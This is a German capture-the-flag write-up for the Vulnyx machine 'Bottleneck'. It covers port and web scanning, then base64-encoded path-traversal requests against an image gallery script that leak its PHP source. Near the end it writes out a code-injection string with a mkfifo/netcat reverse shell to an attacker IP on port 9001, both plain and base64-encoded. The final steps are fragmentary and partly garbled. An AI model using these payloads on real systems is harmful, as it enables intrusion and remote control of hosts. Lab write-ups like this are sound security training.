Bottleneck - Vulnyx - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
wfuzz
feroxbuster
curl
base64

Inhaltsverzeichnis

Reconnaissance

Als ersten Schritt in der Reconnaissance-Phase nutzen wir ARP-Scan, um aktive Hosts im Netzwerk zu identifizieren. Dies hilft uns, das Zielsystem schnell zu lokalisieren.

┌──(root㉿CCat)-[~]
└─# arp-scan -l
192.168.2.114 08:00:27:75:b3:f0 PCS Systemtechnik GmbH

Hier sehen wir die MAC-Adresse und den Hersteller des Netzwerkadapters. Dies kann uns weitere Hinweise auf das Betriebssystem oder die Art des Geräts geben.

Um die Hostnamen aufzulösen, fügen wir den gefundenen Host in die /etc/hosts-Datei ein. Dies erleichtert die weitere Arbeit mit dem Zielsystem, da wir den Hostnamen anstelle der IP-Adresse verwenden können.

┌──(root㉿CCat)-[~]
└─# echo "192.168.2.114 bottleneck.vln" >> /etc/hosts
┌──(root㉿CCat)-[~]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 CCat
192.168.2.114 bottleneck.vln

Ein Eintrag in der /etc/hosts Datei erleichtert die Identifizierung des Systems.

Die IP-Adresse die zum scannen verwendet wird lautet: 192.168.2.114

Nmap wird verwendet, um die offenen Ports und Dienste des Zielsystems zu scannen.

Nmap IPv6 Scan :
IPv6 Adresse: fe80a00:27ff:fee2:95%eth0:
┌──(root㉿CCat)-[~]
└─# nmap -6 -Pn fe80::a00:27ff:fe75:b3f0%eth0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 22:37 CET
Nmap scan report for bottleneck (fe80a00:27ff:fe75:b3f0)
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PRT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:75:B3:F0 (racle VirtualBox virtual NIC)

Nmap scan report for fe80d0a5:97c8:ee04:6f55
Host is up (0.0000060s latency).
All 65535 scanned ports on fe80d0a5:97c8:ee04:6f55 are in ignored states.
Not shown: 65535 closed tcp ports (reset)

Nmap done: 2 IP addresses (2 hosts up) scanned in 16.98 seconds

Die Nmap-Ergebnisse zeigen, dass SSH (Port 22) und HTTP (Port 80) geöffnet sind.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
22/tcp open ssh penSSH 7.9p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx

Dieser Befehl führt einen umfassenden Nmap-Scan durch, um alle offenen Ports und zugehörigen Dienste auf dem Zielsystem zu identifizieren.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 22:37 CET
Nmap scan report for dc9.vln (192.168.2.114)
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
22/tcp open ssh penSSH 7.9p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 be:e0:d5:75:76:ea:d4:f3:91:77:f9:47:20:7d:bf:a4 (RSA)
| 256 7a:34:90:c0:59:d1:db:63:bd:4e:ca:5e:6f:ee:e7:2d (ECDSA)
|_ 256 c9:b9:66:ce:28:ad:b7:b3:d9:bb:ed:22:0d:e4:45:db (ED25519)
80/tcp open http nginx
|_http-title: BTTLENECK
MAC Address: 08:00:27:75:B3:F0 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: S: Linux; CPE: cpe:/o:linux:linux_kernel

TRACERUTE
HP RTT ADDRESS
1 0.16 ms dc9.vln (192.168.2.114)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.03 seconds

Die vollständige Nmap-Ausgabe zeigt, dass SSH (Port 22) und HTTP (Port 80) geöffnet sind. Es werden auch die SSH-Hostschlüssel und der HTTP-Server-Header angezeigt.

Web Enumeration

Nikto wird verwendet, um Webserver auf potenzielle Schwachstellen und Konfigurationsfehler zu scannen.

┌──(root㉿CCat)-[~]
└─# nikto -h 192.168.2.114
- Nikto v2.5.0

+ Target IP: 192.168.2.114
+ Target Hostname: 192.168.2.114
+ Target Port: 80
+ Start Time: 2024-10-31 22:38:14 (GMT1)

+ Server: nginx
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2024-10-31 22:39:02 (GMT1) (48 seconds)

+ 1 host(s) tested

Nikto findet verschiedene interessante Punkte: Das Fehlen von Clickjacking- und Content-Type-ption-Headern und die Datei /#wp-config.php#.

Gobuster wird verwendet, um versteckte Verzeichnisse und Dateien auf dem Webserver zu finden.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.114/index.php (Status: 200) [Size: 10175]
http://192.168.2.114/img (Status: 301) [Size: 162] [--> http://192.168.2.114/img/]
http://192.168.2.114/css (Status: 301) [Size: 162] [--> http://192.168.2.114/css/]
http://192.168.2.114/js (Status: 301) [Size: 162] [--> http://192.168.2.114/js/]
http://192.168.2.114/vendor (Status: 301) [Size: 162] [--> http://192.168.2.114/vendor/]
http://192.168.2.114/image_gallery.php (Status: 200) [Size: 6381]

Gobuster findet die Dateien index.php und image_gallery.php sowie die Verzeichnisse img, css, js und vendor.

Der Quellcode der index.php-Datei wird angezeigt.

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.114/index.php
-- shit, seriously matrix 4 is real? I'm scared.. --

-- Clients --
┌──(root㉿CCat)-[~]
└─# feroxbuster --url "http://192.168.2.114" --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .git,.php,.html,.xml,.zip,.7z,.tar,.bak,.sql,.py,.pl,.txt,.jpg,.jpeg,.png,.js,.aac,.ogg,.flac,.alac,.wav,.aiff,.dsd,.mp3,.mp4,.mkv,.phtml -s 200 301 302
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.2.114
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 301, 302]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [git, php, html, xml, zip, 7z, tar, bak, sql, py, pl, txt, jpg, jpeg, png, js, aac, ogg, flac, alac, wav, aiff, dsd, mp3, mp4, mkv, phtml]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301 GET 7l 11w 162c http://192.168.2.114/img => http://192.168.2.114/img/
200 GET 46l 159w 8557c http://192.168.2.114/img/about/4.jpg
200 GET 7l 989w 78635c http://192.168.2.114/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 7l 1966w 155758c http://192.168.2.114/vendor/bootstrap/css/bootstrap.min.css
200 GET 25l 154w 12398c http://192.168.2.114/img/about/1.jpg
200 GET 2l 1276w 88145c http://192.168.2.114/vendor/jquery/jquery.min.js
200 GET 5l 83w 56517c http://192.168.2.114/vendor/fontawesome-free/css/all.min.css
200 GET 32l 147w 13088c http://192.168.2.114/img/about/3.jpg
200 GET 7l 75w 14784c http://192.168.2.114/img/beerpwn4.png
200 GET 42l 138w 1293c http://192.168.2.114/js/agency.js
200 GET 683l 1772w 15485c http://192.168.2.114/css/agency.css
200 GET 42l 189w 12855c http://192.168.2.114/img/vendetta.jpg
200 GET 1l 44w 2532c http://192.168.2.114/vendor/jquery-easing/jquery.easing.min.js
200 GET 52l 278w 27787c http://192.168.2.114/img/about/2.jpg
200 GET 272l 729w 10175c http://192.168.2.114/
200 GET 272l 729w 10175c http://192.168.2.114/index.php
301 GET 7l 11w 162c http://192.168.2.114/img/about => http://192.168.2.114/img/about/
301 GET 7l 11w 162c http://192.168.2.114/css => http://192.168.2.114/css/
301 GET 7l 11w 162c http://192.168.2.114/js => http://192.168.2.114/js/
301 GET 7l 11w 162c http://192.168.2.114/vendor => http://192.168.2.114/vendor/
301 GET 7l 11w 162c http://192.168.2.114/vendor/bootstrap => http://192.168.2.114/vendor/bootstrap/
200 GET 168l 348w 6381c http://192.168.2.114/image_gallery.php
301 GET 7l 11w 162c http://192.168.2.114/vendor/bootstrap/css => http://192.168.2.114/vendor/bootstrap/css/
301 GET 7l 11w 162c http://192.168.2.114/vendor/bootstrap/js => http://192.168.2.114/vendor/bootstrap/js/
301 GET 7l 11w 162c http://192.168.2.114/vendor/jquery => http://192.168.2.114/vendor/jquery/
[#>--] - 17m 15967167/61753664 51m found:25 errors:5322
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_192_168_2_114-1730412809.state ...
[#>--] - 17m 15967673/61753664 51m found:25 errors:5322
[>-] - 17m 2119740/6175288 2131/s http://192.168.2.114/
[>-] - 17m 2145724/6175288 2158/s http://192.168.2.114/img/
[>-] - 17m 2152808/6175288 2165/s http://192.168.2.114/img/about/
[>-] - 17m 2104564/6175288 2121/s http://192.168.2.114/css/
[>-] - 16m 2087064/6175288 2109/s http://192.168.2.114/js/
[>-] - 16m 2111452/6175288 2142/s http://192.168.2.114/vendor/
[#>-] - 10m 1055208/6175288 1694/s http://192.168.2.114/vendor/bootstrap/
[#>-] - 10m 1006432/6175288 1635/s http://192.168.2.114/vendor/bootstrap/css/
[#>-] - 10m 1000328/6175288 1639/s http://192.168.2.114/vendor/bootstrap/js/
[>-] - 3m 250096/6175288 1363/s http://192.168.2.114/vendor/jquery/

Initial Access

Die Parameter werden ausgelesen

http://192.168.2.114/image_gallery.php?t=1730412411&f=Ym90dGxlbmVja19kb250YmUucG5n
https://www.base64decode.org/

Der base64 String wird dekodiert.

Ym90dGxlbmVja19kb250YmUucG5n
bottleneck_dontbe.png

Privilege Escalation

http://192.168.2.114/image_gallery.php?t=1730412411&f=aWQ=
┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.114/img/bottleneck_dontbe.png -sI
HTTP/1.1 200 K
Server: nginx
Date: Thu, 31 ct 2024 22:15:42 GMT
Content-Type: image/png
Content-Length: 27683
Last-Modified: Mon, 23 Sep 2019 21:24:46 GMT
Connection: keep-alive
ETag: "5d89381e-6c23"
Accept-Ranges: bytes
https://www.confirado.de/tools/timestamp-umrechner.html
Einen Unix-Timestamp in ein Datum umrechnen
Der Timestamp 1730412411 entspricht dem 31.10.2024 um 23:06:51 Uhr.
(gilt für UTC+1)
Timestamp

Zeitzone
Der 31.10.2024 um 23:35:00 Uhr entspricht dem Timestamp 1730414100.
(gilt für UTC+1)
Datum (tt.mm.jjjj)

Zeit (hh:mm:ss)

Zeitzone
┌──(root㉿CCat)-[~]
└─# curl -s "http://192.168.2.114/image_gallery.php?t=1730414160&f=L2V0Yy9wYXNzd2Q="
Let me throw away your nice request into the bin.
The SC was informed about your attempt to break into this site. Thanks to previous attackers
effort in smashing my infrastructructure I will take strong legal measures.
Why don't you wait on your chair until someone (maybe the police) knock on your door?

_,..._
/__ \
>< `. \
/_ \ |
\-_ /:|
,--'..'. :
,' `.
_,' \
_.._,--'' , |
, ,',, _| _,.'| | |
\||/,'(,' '--'' | | |
_ ||| | /-' |
| | (- -)<`._ | / /
| | \_\/_/`-.(<< |____/ /
| | / \ / -'| `--.'|
| | \___/ / /
| | H H / | |
|_|_..-H-H--.._ / ,| |
|-.._"_"__..-| | _-/ | |
| | | | \_ |
| | | | | |
| | |____| | |
| | _..' | |____|
| |_(____..._' _.' |
`-..______..-'"" (___..--'
┌──(root㉿CCat)-[~]
└─# for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730414640&f=L2V0Yy9wYXNzd2Q=";echo $i;done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Let me throw away your nice request into the bin.
The SC was informed about your attempt to break into this site. Thanks to previous attackers
effort in smashing my infrastructructure I will take strong legal measures.
Why don't you wait on your chair until someone (maybe the police) knock on your door?

_,..._
/__ \
>< `. \
/_ \ |
\-_ /:|
,--'..'. :
,' `.
_,' \
_.._,--'' , |
, ,',, _| _,.'| | |
\||/,'(,' '--'' | | |
_ ||| | /-' |
| | (- -)<`._ | / /
| | \_\/_/`-.(<< |____/ /
| | / \ / -'| `--.'|
| | \___/ / /
| | H H / | |
|_|_..-H-H--.._ / ,| |
|-.._"_"__..-| | _-/ | |
| | | | \_ |
| | | | | |
| | |____| | |
| | _..' | |____|
| |_(____..._' _.' |
`-..______..-'"" (___..--'
16
Passwd funktioniert nicht...
Payload = ../../../../../../../../../../image_gallery.php >> Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vaW1hZ2VfZ2FsbGVyeS5waHA=
Payload = ../image_gallery.php >> Li4vaW1hZ2VfZ2FsbGVyeS5waHA=
┌──(root㉿CCat)-[~]
└─# for i in {1..80}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730415090&f=Li4vaW1hZ2VfZ2FsbGVyeS5waHA=";echo $i;done

CHANGELG
v1.1: Still testing without content.
I've fixed that problem that @p4w and @ska notified me after hacker attack.
Shit I'm too lazy to make a big review of my code.
I think that the LFI problem can be mitigated with the blacklist.
By the way to protect me from attackers, all malicious requests are immediately sent to the SC

v1.0: Starting this beautiful gallery

$tstamp = time();
if(isset($GET['t']) && isset($GET['f'])){

include_once 'image_gallery_load.php';

exit();
}
Payload = ../image_gallery_load.php >> Li4vaW1hZ2VfZ2FsbGVyeV9sb2FkLnBocA
┌──(root㉿CCat)-[~]
└─# for i in {1..80}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730415510&f=Li4vaW1hZ2VfZ2FsbGVyeV9sb2FkLnBocA";echo $i;done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function print_troll(){
$messages = $GLBALS['messages'];
$troll = $GLBALS['troll'];
echo $messages[0];
echo $troll;
}

$troll = <<
_,..._
/__ \
>< `. \
/_ \ |
\-_ /:|
,--'..'. :
,' `.
_,' \
_.._,--'' , |
, ,',, _| _,.'| | |
\\||/,'(,' '--'' | | |
_ ||| | /-' |
| | (- -)<`._ | / /
| | \_\/_/`-.(<< |____/ /
| | / \ / -'| `--.'|
| | \___/ / /
| | H H / | |
|_|_..-H-H--.._ / ,| |
|-.._"_"__..-| | _-/ | |
| | | | \_ |
| | | | | |
| | |____| | |
| | _..' | |____|
| |_(____..._' _.' |
`-..______..-'"" (___..--'

ET;

if(!isset($GET['t']) || !isset($GET['f'])){
exit();
}

$imagefile = base64_decode($GET['f']);
$timestamp = time();
$isblocked = FALSE;
$blacklist = array('/etc','/opt','/var','/opt','/proc','/dev','/lib','/bin','/usr','/home','/ids');
$messages = array("\nLet me throw away your nice request into the bin.\n".
"The SC was informed about your attempt to break into this site. Thanks to previous attackers effort in smashing my infrastructructure I will take strong legal measures.\n".
"Why don't you wait on your chair until someone (maybe the police) knock on your door?\n\n");

if(abs($GET['t'] - $timestamp) > 10){
exit();
}
foreach($blacklist as $elem){
if(strstr($imagefile, $elem) ! FALSE)
$isblocked = TRUE;
}
// report the intrusion to the soc and save information locally for further investigation
if($isblocked){
$logfile = 'intrusion_'.$timestamp;
$fp = fopen('/var/log/soc/'.$logfile, 'w');
fwrite($fp, "'".$imagefile."'");
fclose($fp);
exec('python /opt/ids_strong_bvb.py /tmp/output 2>&1');
print_troll();
exit();
}
chdir('img');
$filecontent = file_get_contents($imagefile);
if($filecontent = FALSE){
print_troll();
}
else{
echo $filecontent;
}
chdir('../');

?>
18
../etc/passwd' and __import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 9001 >/tmp/f") and ' ../../../../../tmp/output
../etc/passwd' and __import__(\"os\").system(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 9001 >/tmp/f\") and '
1730329230
for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t= ";echo $i;done
for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t= ";echo $i;done
for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t= ";echo $i;done
for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730414160&f=L2V0Yy9wYXNzd2Q=";echo $i;done
1730330730
for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730330960&f=Li4vZXRjL3Bhc3N3ZCcgYW5kIF9faW1wb3J0X18oIm9zIikuc3lzdGVtKCJybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjIuMTk5IDQ0NDQgPi90bXAvZiIpIGFuZCAn";echo $i;done

Flags

cat user.txt userflag
cat root.txt rootflag